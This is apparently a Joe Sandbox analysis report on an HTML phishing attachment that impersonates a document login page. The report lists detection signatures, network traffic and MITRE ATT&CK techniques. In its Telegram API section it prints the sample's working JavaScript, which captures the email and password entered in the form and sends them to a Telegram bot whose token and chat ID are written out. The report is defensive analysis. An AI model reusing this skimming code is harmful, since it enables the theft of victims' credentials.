Edit tour

Windows Analysis Report
swift-copy31072024PDF.html

Overview

General Information

Sample name:	swift-copy31072024PDF.html
Analysis ID:	1544346
MD5:	21de1eced0bba2c144b3f9a267f95fd7
SHA1:	d08160beca4b007084fc5e9b1df1ce3b44de6e85
SHA256:	6aa352aa8f89d3dbc564639ea5ad6c32b3ab5b248b087dca8d37b483674de47a
Infos:

Detection

HTMLPhisher

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish10

HTML document with suspicious name

HTML file submission containing password form

Javascript uses Telegram API

Uses the Telegram API (likely for C&C communication)

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

None HTTPS page querying sensitive user data (password, username or email)

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\swift-copy31072024PDF.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1876,i,5721794662497170584,7017191593047677730,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
swift-copy31072024PDF.html	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html

LLM: Score: 10 Reasons: HTML file with login form DOM: 1.0.pages.csv

Yara detected HtmlPhish10

Source: Yara match

File source: swift-copy31072024PDF.html, type: SAMPLE

Javascript uses Telegram API

Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html

HTTP Parser: document.getelementbyid('loginform').addeventlistener('submit', function(event) { event.preventdefault(); var email = document.getelementbyid('email').value; var password = document.getelementbyid('password').value; var apikey = '7143837038:aah8epg67nubqq5-xg1extwtgi0rzkmui28'; var chatid = '7463984269'; var message = 'submission:\nemail: ' + email + '\npassword: ' + password; var url = 'https://api.telegram.org/bot' + apikey + '/sendmessage?chat_id=' + chatid + '&text=' + encodeuricomponent(message); fetch(url) .then(function(response) { if (response.ok) { alert('failed: sign in incorrect. please press ok and try again.'); } else { alert('failed: sign in incorrect. please press ok and try again.'); } }) .catch(function(error) { alert('verbumnetworks.net'); }); });

Source: swift-copy31072024PDF.html	HTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: Number of links: 0

Source: swift-copy31072024PDF.html	HTTP Parser: <input type="password" .../> found but no <form action="...
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: <input type="password" .../> found but no <form action="...

Source: swift-copy31072024PDF.html	HTTP Parser: Title: continue does not match URL
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: Title: continue does not match URL

Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html

HTTP Parser: Has password / email / username input fields

Source: swift-copy31072024PDF.html	HTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: <input type="password" .../> found

Source: swift-copy31072024PDF.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: No favicon

Source: swift-copy31072024PDF.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: No <meta name="author".. found

Source: swift-copy31072024PDF.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:56535 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 29MB

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56528 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56530 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56547 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56540 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56537 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56533 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56529 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56529
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56525 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56525
Source: unknown	Network traffic detected: HTTP traffic on port 56546 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56526
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56527
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56528
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56530
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56531
Source: unknown	Network traffic detected: HTTP traffic on port 56543 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56536 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56526 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56532 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56536
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56537
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56539
Source: unknown	Network traffic detected: HTTP traffic on port 56545 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56532
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56533
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56534
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56535
Source: unknown	Network traffic detected: HTTP traffic on port 56539 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56540
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56541
Source: unknown	Network traffic detected: HTTP traffic on port 56542 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56542
Source: unknown	Network traffic detected: HTTP traffic on port 56535 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 56527 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56531 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56547
Source: unknown	Network traffic detected: HTTP traffic on port 56544 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56543
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56544
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56545
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56546
Source: unknown	Network traffic detected: HTTP traffic on port 56541 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 56534 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:56535 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: swift-copy31072024PDF.html

Initial sample: swift

Source: classification engine

Classification label: mal72.phis.troj.winHTML@14/20@8/97

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\swift-copy31072024PDF.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1876,i,5721794662497170584,7017191593047677730,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1876,i,5721794662497170584,7017191593047677730,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html

HTTP Parser: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	1 Extra Window Memory Injection	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	142.250.185.132	true	false		unknown
api.telegram.org	149.154.167.220	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/swift-copy31072024PDF.html	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
216.58.212.142	unknown	United States	15169	GOOGLEUS	false
216.58.206.67	unknown	United States	15169	GOOGLEUS	false
173.194.76.84	unknown	United States	15169	GOOGLEUS	false
172.217.18.3	unknown	United States	15169	GOOGLEUS	false
142.250.185.132	www.google.com	United States	15169	GOOGLEUS	false
216.58.206.46	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16
192.168.2.5

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544346
Start date and time:	2024-10-29 10:06:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Sample name:	swift-copy31072024PDF.html
Detection:	MAL
Classification:	mal72.phis.troj.winHTML@14/20@8/97
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 216.58.206.67, 216.58.212.142, 173.194.76.84, 34.104.35.123, 93.184.221.240
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: swift-copy31072024PDF.html

LLM Input / Output

Input	Output
URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: URL: ://
URL: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "Login to view document", "prominent_button_name": "Login to view document", "text_input_field_labels": [ "Email:", "Password:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "Login to view document", "prominent_button_name": "Login to view document", "text_input_field_labels": [ "Email:", "Password:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html Model: claude-3-haiku-20240307	```json { "brands": [ "kghm.com" ] }
	```json { "brands": [ "kghm.com" ] }
URL: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html Model: claude-3-haiku-20240307	```json { "brands": [ "kghm.com" ] }
	```json { "brands": [ "kghm.com" ] }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 08:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9854188075400927
Encrypted:	false
SSDEEP:
MD5:	0EF60CCBCBF6F736AF6D392181B9C592
SHA1:	058C1271166CD99E63F9F087BDEBAF2FBE20E35F
SHA-256:	7A6D02DA1F6B3993875DB8FCE6E32B98505FEF647AD3E31C6DADD373E9A43602
SHA-512:	63A1543A5DD01FE7C061D620A25CDC2108780052917F4E5EEA58896C560446735C72F9F28934C4D6E9C7DC30278BF0127BD8295D50CEC4F3FE5736CA9F3DF77E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.... `...)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]Y.H....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]Y.H....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]Y.H....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]Y.H..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]Y.H...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........G..X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	HTML document, ASCII text, with CRLF line terminators
Entropy (8bit):	4.9172599336527485
TrID:	HyperText Markup Language (15015/1) 38.98% HyperText Markup Language (12001/1) 31.16% HyperText Markup Language (11501/1) 29.86%
File name:	swift-copy31072024PDF.html
File size:	2'371 bytes
MD5:	21de1eced0bba2c144b3f9a267f95fd7
SHA1:	d08160beca4b007084fc5e9b1df1ce3b44de6e85
SHA256:	6aa352aa8f89d3dbc564639ea5ad6c32b3ab5b248b087dca8d37b483674de47a
SHA512:	5a35acb2c0f4b43d02abc47fac83b9cbed81a4e1f02172ac29230b1c000a274080e363646ddc8f6f704e16e40751e8b502e893efc247ef17a02cd810e31d28be
SSDEEP:	48:tMJRFfNAS/IeiHxQPOYXJJB5GviLBvGV6GMtf:23lNAeKviLUVM5
TLSH:	B641656AE9410C816533F3383BA64208FB96C0630707EA293D5C66AA0FB5D446923FCD
File Content Preview:	<!DOCTYPE html>..<html>..<head>.. <title>continue</title>.. <style>.. body {.. background-color: #3b79db; .. display: flex;.. justify-content: center;.. align-items: center;.. height: 100vh;.. }.... .container {..

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report swift-copy31072024PDF.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Initial Sample

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Boot Survival

Stealing of Sensitive Information

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

